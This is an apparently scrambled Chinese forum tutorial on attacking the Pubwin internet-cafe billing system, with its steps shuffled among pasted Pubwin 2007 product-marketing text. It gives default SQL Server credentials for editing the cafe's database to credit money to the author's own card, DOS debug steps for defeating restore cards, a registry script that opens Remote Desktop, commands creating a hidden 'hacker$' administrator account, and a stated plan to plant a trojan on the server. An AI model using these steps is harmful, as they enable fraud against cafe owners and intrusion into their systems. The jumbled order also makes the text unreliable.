开始吧，大家看我操作就是，这个是个抓抱工具，我们抓主机IP。找到这个进程

再次运行debug ,键入:

开机过程按住F8键,进入纯dos环境, 注";"后为注释.

出现提示符c:,

- int 13

这里就是纪录了，同样，改了就可以，网管就查不出来了。

1.先破解还原卡

键入c:\debug,

3.利用真实桌面

开机时(也就是在你曾经进入cmos的时刻),同时按住ctrl+home,这样你就进入了 还原卡的密码输入窗口,只要输入正确的密码即可获得admin,以后随你怎样设置。一般还原卡都有默认密码的,默认密码怎么找,很简单,到网上搜索关键词"还原卡"就行了,找到你用的那个牌子的还原卡,一般可以找到默认密码的.台湾远志牌的还原卡的默认密码是12345678, 小哨兵的是manager,海边的人都离不开海鲜, 而管理员已经把密码改了，所以只好自己破解了。具体过程如下:

成了灵活的思路了。废话不多说，大家也烦。

你还可以通过在地址栏里输入[url=ftp://ip/]ftp://ip[/url]然后登陆失败，你就可以看到网上邻居和其他的东西，如果有写权限你还可以搞搞破坏，呵呵！好了，全部都介绍完了！

这样的教程大家看了也许自己去照着做的时候还是没用，还是那句话：入侵没有绝对

说是漏洞利用而不是网吧破解呢？大家一定要分清楚，利用和破解是两种概念。我敢

还有就是下载一个金山网镖，安装后，把Pub禁了，这样也可以免费上网了

第二步：开3389

连接成功，怎么开3389呢？用段代码吧，到我站上找

这么严重的漏洞又忘了补了。那我可就有机可趁了，呵呵

-e 0:4c 95 9A 00 F0 ;e的作用将数据表"95 9A 00 f0",写入地址0:4c开始的字节中.

虽然我我经常突破网吧的限制，但是，这个网吧的网管也不是吃素的，为了便于保护，他早就把全部都设为虚拟桌面了，机子的操作系统也是windowsXP的，看看能不能进入cmd，我找了半天也没有找到“开始”。试着进入它的C盘看看，打开IE浏览器，在地址栏里输入c:\，晕，连C盘都禁止了，不用说了，其他的文件一定也禁止了，下载一个软件试试，哈哈，没有禁止下载，下载前先看看有没有还原精灵，我左找右找还是没找到，这回可以放心下载了，（注意：下载到桌面，然后会出现一个下载进程的窗口，这是要找到“下载完毕后关闭该对话框”看看它前的方框里面有没有小钩，如果有就把它去掉）下载完毕后不要去点击“关闭”，要点击“打开”，（玩着玩着就死机了，只好重启机，后来才知道，原来有还原精灵）在重启是看到一个桌面，后来有试了一下，原来是真实桌面。好了，以上是网吧的具体情况，下面说一说具体的对策吧！首先是卸载pubwin,卸载前定一个大概的思路吧：

 

你面前了。所以我是不提倡破解的。要么就别做，要做就要做得漂亮。

就没办法了，只要你渗透进去主机拿下了权限，我们把1433端口转发到其他端口同样

可以了，连接看看，怎么样。进去了吧。过会我给他种个木马就走，呵呵

与公安、文化监控系统的整合：与国内大部分公安与文化监控软件实现了无缝衔接。

多级用户权限控管：对网吧各级别操作用户分别设置不同操作权限，操作及管理更加清晰，权责更加明确。

第三步：修改数据

2.进入注册表

这样说一句：如果是破解的话我相信每个网吧都可以免费上网，但有个安全隐患，主机

现在不管它，看，出来了。很明显，主机IP是：192.168.100.240

PUBWIN漏洞在哪呢？记住这个：数据库：local 用户名：netcafe 密码：pubwin

系统特点

- xor ax,ax

2003开3389代码 程序代码

充钱步骤：

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg

大家自己测试。

第三步：添加用户

REGEDIT4

[HKEY_CURRENT_USER、Software\Microsoft\Windows\CurrentVersion\Policies\System]

灵活的部署：通过将核心服务与操作的分离，允许部署任意多个具有完全功能的操作点，可以通过Web管理界面实现远程访问。

融入综合使用习惯：融入市场上众多厂商产品的使用习惯，便于网吧更加人性化的管理及顾客更多种需求。

这些全是卡号，找到自己的。我的是25671155

echo "fDenyTSConnections"=dword:00000000>>3389.reg

regedit /s 3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg

第三次，，干脆把网线拔掉，开机时的鼠标锁在Pubwin EP没有完全启动完毕事不会让你鼠标有很大的活动范围，那么让我们等待，等待时间，听了会音乐，~，当系统启动到让你输入用户名和密码的时候 按住 Ctrl+Alt+Del 出现任务管理器选择进程找到名为 PubwinClient.exe 这个进程 把这个进程结束掉。它很顽固需要多次重复结束它。 2开始-文档-我的文档 然后利用刚打开的 我的文档 窗口 进入（因为现在对桌面不可以进行操作所以只能这样了）到 C:\Program Files 找到名为 Hintsoft 的文件夹并且改名为 Hintsoft1 进入Hintsoft1再次进入 PubwinClient 在文件夹 PubwinClient 要删除一些文件（这些文件名有很多都很相似小心不要删除错了不然就失败了，注意我给你们的后缀名就因该不会错了） 需要删除的6个文件分别是：Config.dat EnviProps.DAT genfs.sys log4cpp.conf pav.dat pubwin.cfg 删除后在利用这个窗口进入到我的桌面 打开 我的电脑 属性（只要打开 设备管理器 随便你用什么办法）在设备管理器里面停用 网络适配器 然后 注销。登陆后再把网线插上！然后在设备管理器里面启用 网络适配器，现在就可以免费上网了。

严谨与高效的业务流程设计：Pubwin 2007业务数据遵循财务准则设计，严谨、规范；众多独到的设计不仅方便顾客使用也大大减轻了服务员的工作强度。

企业级平台：采用基于Web服务的分布式体系结构，建立在高性能的数据库SQL Server和J2EE容器Tomcat和安全、稳定、可扩展的Apache之上，能够支持Linux和Windows等多种操作系统。企业级构架使Pubwin 2007拥有可靠与强大的处理能力，完全能够胜任超大规模网吧的需求。

- a100

-q

 2007较Pubwin EP有了很大的飞跃，主要表现在：客户端在启动速度及防破解力有很大提高；服务器数据可靠性和整体性能上有大幅提高；对网吧的日常操作方便性上有很大提高；不但具有强大功能，而且软件的易用性有很大提高，方便网管上手及使用。

支持丰富的商业策略：从应有尽有的促销手段到无所不能的价格方案， Pubwin 2007帮助客户从容应对激烈的市场竞争。

"DisableRegistry Tools"=dword:00000000

第一步：找主机IP （工具：WSock Expert）

今天带来的是PUBWIN EP-PUBWIN 2007漏洞利用达到给自己上网卡充钱的目的。为什么

第二步：默认账号密码连接（工具：数据库管理助手）

第一步：1433端口连接（工具：SQLTools）

软件极性贴心设计：人性化的界面设置、简单便捷的向导式初始配置、通俗易懂整注释等提示语言，清晰明了的各种提醒和查询信息，多重的自定义设置功能等做到易上手、易于使用、便于管理。

完备的连锁管理功能：秉承Pubwin.net强大的连锁体系，优化完善Pubwin EP高效实现储值通用、结算、经营策略下发等连锁功能，付出极低成本即可实现中小型连锁网吧管理。范；众多独到的设计不仅方便顾客使用也大大减轻了服务员的工作强度。

net localgroup administrators hacker$ /add

echo "PortNumber"=dword:00000d3d>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg

破解完成。设为不还原就可以了，打开浏览器，点击上面的“查看---〉源文件”，把里面的代码全部删除，输入如下内容：

echo Windows Registry Editor Version 5.00>>3389.reg

上绝对会提示非法操作，要么破解后没几分钟你电脑就蓝频了，再等一会的话网管就跑

以上是解除“禁止使用注册表编辑”。接下来就是解除其它所有禁止的功能，好了把C盘设为可访问吧（在网上有一系列的关于注册表解锁的代码，这里笔者就不一一叙述了）。好了，时间也差不多了，开始卸载pubwin客户端吧。重启机，刚刚出现桌面时点击开始把鼠标移到“所有程序”上（速度要快，否则很快就会变成虚拟桌面）好了下面点击子菜单里的“Hintsoft"会出现一个子菜单，点击子菜单中的”网吧管理客户端“还会出现一个子菜单这时点击“卸载”，然后一路点击“是”就可以卸载了，重启机生效。卸载完了。这时就自由了。

我就不弄了，改好后我们要注销用户再登陆，或者换台机器，你就惊奇的发现，你的钱

第二次 ，我掉出任务管理器，由于pb2007比较顽固，任务管理器总是一闪而过，所以很麻烦，要抓准时间结束掉pb2007进程！进去了之后还没等我修改文件，啪的一下自动关机了，行~pb2007的确够狠！

结束PUB2007的工具下载地址(下载前请登陆http://www.gbaopan.com/)

首先去网吧的收费台定时，15分钟足矣！开始行动，首先我们来破解它的还原卡，让我来给大家介绍一下吧，

; 寻找原始的int 13入口. 然后输入t回车，不断的重复，直到显示的地址形如 F001:xxxx ,后面的指令为:mov dl,80 (练练眼力-。按q退出. 记下这一地址, 在(0:13H*4)=0:4cH 处填入这个地址。

注: 本人只管发帖 学会了算你的本事 如果被发现抓到了 <本人盖不负责!>

还没法复制，郁闷了

5.结束突破，免费上网

刚才命令可能打错了，我又打了次，看看吧，怎么样，3389开了

防破解、防木马：Pubwin 2007完善 Pubwin EP先进的Genfs技术，从操作系统核心入手，从根本上解决了网吧破解难题；Pubwin 2007优化提高原Pubwin EP内嵌的杀毒引擎功能，通过自动更新非法程序库，有效防止各种盗号木马行为，进一步加强网络安全性，为顾客创造了良好的上网环境。

强大的安全保障：网络通讯全面采用数字证书认证体系,英雄合击传奇，具有与网上银行同等的安全级别；基于角色的权限管理允许灵活定制管理权限；具有完备的数据保密、备份、灾难恢复等机制，保证数据高度安全可靠。

del 3389.reg

易于使用与维护：Pubwin 2007充分考虑了不同层次使用者的接受能力，服务员经过10分钟简单培训就能掌握，管理人员则拥有众多工具和方法用于简化管理与维护,也不会感到尴尬。此外，为了帮助用户尽快熟练掌握Pubwin 2007的应用,再说一句爱你就天打雷劈，Pubwin 2007新加入清晰明了的向导式配置，做到让用户可在最短时间内完成软件的基本配置及使用，新浩艺公司还提供了多种方式的培训和技术支持。

下面介绍一下破解pubwin密码的方法吧，首先下载winhex,然后打开RemEditor,找到pubwin#（*****）（注意：*****是数字，例如：429856784）双击pubwin，在下面的列表中选中PrimaryMemory，然后查找:004300D0，好了，后面就有管理员密码了，密码也破解完了做你自己想做的事吧！

4.结束卸载

要求必须是主机开了1433的情况下。如果1433被屏蔽了，连接必定失败。当然也不是

下面来连接，OK。成功,变态传奇65535，看我修改，找到这个健值：cur_user

集中管理能力：将配置、升级等任务集中到服务器处理，使管理工作大量减少，变得高效。

建个用户，命令：net user hacker$ hacker /add

吧发现了点东西，网管把以前的EP系统换成了2007的。不知道他是偷懒还是没技术，

那就是20元了。点勾保存，下步改纪录

第一次，更改bios时间，到2050，F10保存退出，启动后。。。无法破解，修复了EP的这个漏洞，呵呵~

PUBWIN收费系统漏洞出来已经很久，估计大多网吧都已经把漏洞给补上了，前几天上网

的方法，只有你灵活的思路。。。就算你没法利用也没事，学的死方法多了，它就自然

的可以充钱。

入侵主机步骤：

- int3

例如，我的得到的地址是F001:9A96

充完钱我们来试试主机入侵吧，同样是利用这个漏洞。看我操作

看到这个Prepay这个就是钱了，我充的是10元，这里显示单位是分，如果我改成2000

多了，呵呵

美萍和万象已经是过去了，现在有出现一些新的网吧记费管理系统---punwin，呵呵，在网上搜一下关于破解pubwin的方法，怎么样？是不是少之又少？我们这边新开了一家网吧，刚好记费管理系统就是pubwin，也是我们这边唯一的一个安装pubwin的网吧，对于喜欢玩新事物的我当然要玩玩啦~~！相信你们那边也一定安了吧？好了 废话少说，下面让我介绍一下如何对付pubwin的方法吧！虽然没有抓图，不过我会尽量说的详细些，保证你能看懂。

卸载pubwin的方法就介绍完了，你可以免费上网了。

echo "PortNumber"=dword:00000d3d>>3389.reg

就是这段了，我们一条条写进去。现在看看开了没有，命令：netstat -an